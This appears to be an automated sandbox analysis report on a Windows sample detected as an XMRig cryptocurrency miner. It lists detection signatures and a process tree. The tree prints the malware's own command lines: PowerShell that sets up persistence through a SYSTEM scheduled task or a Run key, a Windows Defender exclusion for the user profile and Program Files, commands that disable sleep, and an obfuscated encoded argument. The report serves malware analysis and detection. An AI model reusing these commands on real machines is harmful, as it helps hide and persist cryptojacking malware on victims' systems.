Edit tour
Windows
Analysis Report
ahlntQUj2t.exe
Overview
General Information
| Sample name: | ahlntQUj2t.exerenamed because original name is a hash value |
| Original sample name: | 75a1567b2fdb22e1e074aed9cd5e759013ea59bf7b1ef8d7f32c524f32b680c9.exe |
| Analysis ID: | 1548723 |
| MD5: | 934e9a3e294fa41c527fbd6dc867ddec |
| SHA1: | 57edab4c313a7b3bf083a0c3364195b0491e00ba |
| SHA256: | 75a1567b2fdb22e1e074aed9cd5e759013ea59bf7b1ef8d7f32c524f32b680c9 |
| Tags: | exeuser-Chainskilabs |
| Infos: |   |
 | |
Detection
Xmrig
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to detect virtual machines (STR)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
ahlntQUj2t.exe (PID: 7704 cmdline: "C:\Users\ user\Deskt op\ahlntQU j2t.exe" MD5: 934E9A3E294FA41C527FBD6DC867DDEC) 
powershell.exe (PID: 7988 cmdline: C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# ubqexh#> I F((New-Obj ect Securi ty.Princip al.Windows Principal( [Security. Principal. WindowsIde ntity]::Ge tCurrent() )).IsInRol e([Securit y.Principa l.WindowsB uiltInRole ]::Adminis trator)) { IF([Syste m.Environm ent]::OSVe rsion.Vers ion -lt [S ystem.Vers ion]"6.2") { schtask s /create /f /sc onl ogon /rl h ighest /ru 'System' /tn 'GQFEN PEL' /tr ' ''C:\Progr am Files\x jfgcnhmcvx y.exe''' } Else { Re gister-Sch eduledTask -Action ( New-Schedu ledTaskAct ion -Execu te 'C:\Pro gram Files \xjfgcnhmc vxy.exe') -Trigger ( New-Schedu ledTaskTri gger -AtSt artup) -Se ttings (Ne w-Schedule dTaskSetti ngsSet -Al lowStartIf OnBatterie s -Disallo wHardTermi nate -Dont StopIfGoin gOnBatteri es -DontSt opOnIdleEn d -Executi onTimeLimi t (New-Tim eSpan -Day s 1000)) - TaskName ' GQFENPEL' -User 'Sys tem' -RunL evel 'High est' -Forc e; } } Els e { reg ad d "HKCU\SO FTWARE\Mic rosoft\Win dows\Curre ntVersion\ Run" /v "G QFENPEL" / t REG_SZ / f /d 'C:\P rogram Fil es\xjfgcnh mcvxy.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 8004 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7716 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amFiles) - Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7724 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7972 cmdline:
C:\Windows \System32\ cmd.exe /c powercfg /x -hibern ate-timeou t-ac 0 & p owercfg /x -hibernat e-timeout- dc 0 & pow ercfg /x - standby-ti meout-ac 0 & powercf g /x -stan dby-timeou t-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7980 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 8040 cmdline:
powercfg / x -hiberna te-timeout -ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 8116 cmdline:
powercfg / x -hiberna te-timeout -dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 8148 cmdline:
powercfg / x -standby -timeout-a c 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 8168 cmdline:
powercfg / x -standby -timeout-d c 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- powershell.exe (PID: 7264 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# ydxtfs#> I F((New-Obj ect Securi ty.Princip al.Windows Principal( [Security. Principal. WindowsIde ntity]::Ge tCurrent() )).IsInRol e([Securit y.Principa l.WindowsB uiltInRole ]::Adminis trator)) { schtasks /run /tn " GQFENPEL" } Else { " C:\Program Files\xjf gcnhmcvxy. exe" } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7292 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 6752 cmdline:
"C:\Window s\system32 \schtasks. exe" /run /tn GQFENP EL MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- xjfgcnhmcvxy.exe (PID: 6384 cmdline:
"C:\Progra m Files\xj fgcnhmcvxy .exe" MD5: 934E9A3E294FA41C527FBD6DC867DDEC) - conhost.exe (PID: 2384 cmdline:
C:\Windows \System32\ conhost.ex e xcgkmjxj dowq MD5: 0D698AF330FD17BEE3BF90011D49251D) - conhost.exe (PID: 8180 cmdline:
C:\Windows \System32\ conhost.ex e gzssiant htxzdggz 6 E3sjfZq2rJ QaxvLPmXgs BL6xjjYguH WtOpZ+stId vug8Rp3hia ni4Twfqfj5 pfOQ4C5/lI R+WrKX/39l FBfrYgVA5x lELaQrgfEY I/1+l+sm6d 1wY+jp8lQ+ gyInBZtRry f27JkgwVg8 +gc8zt/+Qw /FqR21gXGs iWp5M1/PaU O8B8L/yFa9 vhQOOMQzU9 osOZwr+lVW CnvU0S6ajO 3l3PA+IO3t Z+KIHzg9oJ DykmRT9FPo LVpg3f2E+S /d4wYAneGa TBaw9u+h7y SSQW4uLa2R drQlsNvaot hGQq4OkU9/ 7weTT4gwdl FYcJqzkf6C rPgHCU2Z2X /1LqnGA0Z/ oGM3RQZ3KF MH6aI6u72M x/Roo9xz5o go8pI2aMP1 z57eBCyYbX yiGT0rCG54 0iwNf53KRD w5r+qu9TX7 DnABrUnuCb tJtyaOErrf hHdH0mzc3o Hhwbzk+xXd FEnj5LezfN 80ibSpckaU WKu/Nc8n5n 3862TFcZoV 3+5pG7wnvA Ca9eswJk6I Y7ANEpRFN9 HJzRPurRT3 aTK7NgnMwc 4gmU= MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7112 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amFiles) - Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 972 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 1408 cmdline:
C:\Windows \System32\ cmd.exe /c powercfg /x -hibern ate-timeou t-ac 0 & p owercfg /x -hibernat e-timeout- dc 0 & pow ercfg /x - standby-ti meout-ac 0 & powercf g /x -stan dby-timeou t-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3792 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7796 cmdline:
powercfg / x -hiberna te-timeout -ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 7164 cmdline:
powercfg / x -hiberna te-timeout -dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 2196 cmdline:
powercfg / x -standby -timeout-a c 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 7824 cmdline:
powercfg / x -standby -timeout-d c 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- powershell.exe (PID: 7460 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# ubqexh#> I F((New-Obj ect Securi ty.Princip al.Windows Principal( [Security. Principal. WindowsIde ntity]::Ge tCurrent() )).IsInRol e([Securit y.Principa l.WindowsB uiltInRole ]::Adminis trator)) { IF([Syste m.Environm ent]::OSVe rsion.Vers ion -lt [S ystem.Vers ion]"6.2") { schtask s /create /f /sc onl ogon /rl h ighest /ru 'System' /tn 'GQFEN PEL' /tr ' ''C:\Progr am Files\x jfgcnhmcvx y.exe''' } Else { Re gister-Sch eduledTask -Action ( New-Schedu ledTaskAct ion -Execu te 'C:\Pro gram Files \xjfgcnhmc vxy.exe') -Trigger ( New-Schedu ledTaskTri gger -AtSt artup) -Se ttings (Ne w-Schedule dTaskSetti ngsSet -Al lowStartIf OnBatterie s -Disallo wHardTermi nate -Dont StopIfGoin gOnBatteri es -DontSt opOnIdleEn d -Executi onTimeLimi t (New-Tim eSpan -Day s 1000)) - TaskName ' GQFENPEL' -User 'Sys tem' -RunL evel 'High est' -Forc e; } } Els e { reg ad d "HKCU\SO FTWARE\Mic rosoft\Win dows\Curre ntVersion\ Run" /v "G QFENPEL" / t REG_SZ / f /d 'C:\P rogram Fil es\xjfgcnh mcvxy.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8136 cmdline:
C:\Windows \System32\ cmd.exe /c wmic PATH Win32_Vid eoControll er GET Nam e, VideoPr ocessor > "C:\Progra m Files\Go ogle\Libs\ g.log" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2044 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 1888 cmdline:
C:\Windows \System32\ cmd.exe /c wmic PATH Win32_Vid eoControll er GET Nam e, VideoPr ocessor > "C:\Progra m Files\Go ogle\Libs\ g.log" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
WMIC.exe (PID: 4268 cmdline: wmic PATH Win32_Vide oControlle r GET Name , VideoPro cessor MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| Click to see the 1 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
System Summary |   |
|---|
| Source: | Author: Jonathan Cheong, oscd.community: | ||